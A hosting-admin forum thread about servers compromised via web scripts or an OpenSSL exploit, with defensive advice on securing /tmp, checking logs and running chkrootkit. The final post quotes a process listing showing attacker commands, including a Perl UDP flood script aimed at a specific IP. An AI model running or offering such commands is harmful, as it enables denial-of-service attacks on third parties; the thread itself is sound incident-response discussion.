The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

OpenSSL Hack Vulnerability

Discussion in 'General Discussion' started by matthewdavis, Sep 12, 2003.

  1. matthewdavis

    matthewdavis Well-Known Member

    Joined:
    Jun 26, 2003
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    NC, USA
    This is really a fairly known bug. But I do believe our servers are still effected by it due to the fact I have 2 servers that have been hit by this bug. So any insight as to why our servers were hit by this would be greatly appreciated.

    I noticed some fishy directories in /tmp and /usr/tmp. A few names of these directories are .inoe, .xfs, .n, .a, and a directory with a bunch of spaces. And inside these directories are eggdrop bots and programs to hide processes so a normal top or ps output doesn't show anything suspecious.

    All these files are owned by 'nobody' which leads me to believe they came in thru the web server. Plus on one of my servers they left behind a tool called 'scanSSL' which looks for servers with OpenSSL 0.9.6d and older. I keep my server up-to-date with redhat errerta packages and cpanel updates, and yet my server is still vulnerable.

    And I'd be happy to stand corrected about any of this. If I overlooked something, please tell me.

    But I'd suggest everyone checking your /tmp, /var/tmp and /usr/tmp directories for any suspecious directories.

    SSH into your machine and 'ls -a /tmp' and 'ls -a /usr/tmp' and so on.

    cPanel.net Support Ticket Number:
     
  2. matthewdavis

    matthewdavis Well-Known Member

    Joined:
    Jun 26, 2003
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    NC, USA
    Has anyone encountered this? Does anyone have anything suspecious in their /tmp, /usr/tmp, or /var/tmp directories?

    Do a 'ls -alR /var/tmp' or 'ls -alR /usr/tmp' or 'ls -alR /tmp' and if you see anything like eggdrop's or scripts, or irc servers, then its possiable you've been hacked.

    cPanel.net Support Ticket Number:
     
  3. Curious Too

    Curious Too Well-Known Member

    Joined:
    Aug 31, 2001
    Messages:
    427
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    What evidence do you have that this was an OpenSSL exploit? I have had files dropped in the tmp directory via pMachine, GreyMatter, Gallery and a poorly coded Moveable Type template.

    cPanel.net Support Ticket Number:
     
  4. matthewdavis

    matthewdavis Well-Known Member

    Joined:
    Jun 26, 2003
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    NC, USA
    Well, because one of my servers had a few scripts, 'scanSSL' as one of them, and a script which would run nmap and find IPs running web servers. Plus one of them had the 'openssl-too-open.c' program there.

    And from the openssl-too-open.c file -
    So I can only assume it was using an SSL exploit. Current I have a hacker I haven't cracked down on yet because he's just running a simple eggdrop which no dangerous scripts. And I'm monitoring the activity and how he restarts the eggdrop bot.

    I'll post my results when I have some.

    cPanel.net Support Ticket Number:
     
  5. PbG

    PbG Well-Known Member

    Joined:
    Mar 11, 2003
    Messages:
    241
    Likes Received:
    0
    Trophy Points:
    16
  6. techark

    techark Well-Known Member

    Joined:
    May 22, 2002
    Messages:
    280
    Likes Received:
    0
    Trophy Points:
    16
    90% of the time they drop these in via a bad script on a site some where.

    cd /usr/local/apache/domlogs and type grep wget ./*

    Lots of time you find the account they came in through.

    It is a good idea to make your tmp dir no execute to keep them from running the scripts there.

    cPanel.net Support Ticket Number:
     
  7. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    OpenSSH package is currently available via up2date if you are not willing to wait.

    cPanel.net Support Ticket Number:
     
  8. carock

    carock Well-Known Member

    Joined:
    Sep 25, 2002
    Messages:
    232
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    St. Charles, MO
    Lock Icon wrong too...

    According to the Certi Advisory, and RedHat Errata, the version of OpenSSL I had installed on my Cpanel server was vulnerable.

    Yet, there is no lock icon at the top of the WHM News on my box.

    Who's responsible for making those?

    When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from RedHat.

    Chuck

    cPanel.net Support Ticket Number:
     
    #8 carock, Oct 2, 2003
    Last edited: Oct 2, 2003
  9. PbG

    PbG Well-Known Member

    Joined:
    Mar 11, 2003
    Messages:
    241
    Likes Received:
    0
    Trophy Points:
    16
    Re: Lock Icon wrong too...

    Until the release number changes the icon will reflect 0.9.6 as secure but as long as the updates occur I would not worry about the difference between the icon showing 0.9.6b-35.7 and merely 0.9.6/0.9.6b

    cPanel.net Support Ticket Number:
     
  10. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    I am currently having this problem now. What can i do to stop this hacker?
     
  11. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    The first and biggest thing is to secure your /tmp and make it non executable. Alot of stuff comes in though /tmp and is exectured. If you do a search you should be able to find some good information. You also should run chkrootkit to make sure nothing else happened.
     
  12. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    What is the safest permission should we give for "tmp"?
     
  13. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    noexec,nosuid
     
  14. laura

    laura Active Member

    Joined:
    Sep 12, 2003
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    indonesia
    how to knows this /tmp directory already secure (noexec, nosuid)?
     
  15. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    Looking at it is the first thing that comes to my mind. ;)

    If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.
     
  16. BeerUser

    BeerUser Active Member

    Joined:
    Apr 16, 2004
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    PHP:
    LABEL=/                 /                       ext3    defaults,usrquota        1 1
    LABEL
    =/boot             /boot                   ext3    defaults        1 2
    none                    
    /dev/pts                devpts  gid=5,mode=620  0 0
    none                    
    /proc                   proc    defaults        0 0
    none                    
    /dev/shm                tmpfs   defaults        0 0
    /dev/hda2               swap                    swap    defaults        0 0
    /dev/fd0                /mnt/floppy             auto    noauto,owner,kudzu 0 0
    is what I have when i pico the file...

    How come tmp isnt listed at all.. I did use /scripts/securetmp i think it was.
     
  17. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    does /scripts/securetmp does the same trick and secure my tmp?
     
  18. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    If 'tmp' does not have its own partition, then I would use that script as it does somewhat secure it -- which is definitely better than not doing anything.
     
  19. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    ok..
     
  20. tvcnet

    tvcnet Well-Known Member
    PartnerNOC

    Joined:
    Aug 15, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    San Diego
    cPanel Access Level:
    DataCenter Provider
    tmp Secured but hacks continue

    Hi folks.
    For those of you who feel safe after making your /tmp directory non executable.

    We've had it set non executable for months and one morning found the following in /tmp "running" and happily DOS'ing another host.

    nobody 1073 30041 0 16:21 ? 00:00:00 lpd
    nobody 1089 1 0 16:21 ? 00:00:00 /bin/sh
    nobody 9451 1073 0 17:04 ? 00:00:00 sh -c echo "(`whoami`@`uname -n`:`pwd`)"; /
    nobody 9457 9451 0 17:04 ? 00:00:00 /bin/sh
    nobody 9689 10678 0 17:05 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    mysql 9961 5169 0 17:06 ? 00:00:02 /usr/sbin/mysqld --basedir --datadirvar
    mysql 10323 5169 0 17:07 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 11992 10678 0 17:15 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    nobody 12612 9457 22 17:16 ? 00:52:06 perl /tmp/udp.pl 69.64.34.214 6000 1
    mysql 13555 5169 0 17:20 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 13558 9689 0 17:20 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 13559 13558 21 17:20 ? 00:49:13 /usr/bin/perl udp.pl 69.64.34.214 6000 1
    mysql 14053 5169 0 17:21 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 14055 11992 0 17:21 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 14057 14055 21 17:21 ? 00:48:34 /usr/bin/perl udp.pl 69.64.34.214 6000 1
    nobody 16595 10678 0 17:30 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    mysql 16604 5169 0 17:30 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 16608 16595 0 17:30 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 16609 16608 21 17:30 ? 00:46:04 /usr/bin/perl udp.pl 69.64.34.214 6000 1


    Not this command that somehow gets past the non-exectuable setting:
    sh -c cd /dev/shm;/usr/bin/perl udp.pl

    I can assure you that no one has SSH access on our server other than a few trusted clients.

    What do you all make of this?

    Thanks,
    Jim
     
Loading...

Share This Page